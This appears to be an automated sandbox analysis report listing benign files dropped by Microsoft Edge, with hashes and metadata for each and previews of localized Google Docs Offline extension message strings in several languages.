                                                                                                                                                                                                                                                                                      SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                      SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1042
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                      MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                      SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                      SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                      SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2535
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                      MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                      SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                      SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                      SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1028
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                      MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                      SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                      SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                      SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):994
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                      MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                      SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                      SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                      SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2091
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                      MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                      SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                      SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                      SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2778
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                      MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                      SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                      SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                      SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1719
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                      MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                      SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                      SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                      SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):936
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                      MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                      SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                      SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                      SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3830
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                      MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                      SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                      SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                      SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1898
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                      MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                      SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                      SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                      SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):914
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                      MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                      SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                      SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                      SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):851
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):878
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                      MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                      SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                      SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                      SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2766
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                      MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                      SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                      SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                      SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):978
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                      MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                      SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                      SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                      SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):907
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                      MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                      SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                      SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                      SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):914
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                      MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                      SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                      SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                      SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):937
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                      MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                      SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                      SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                      SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
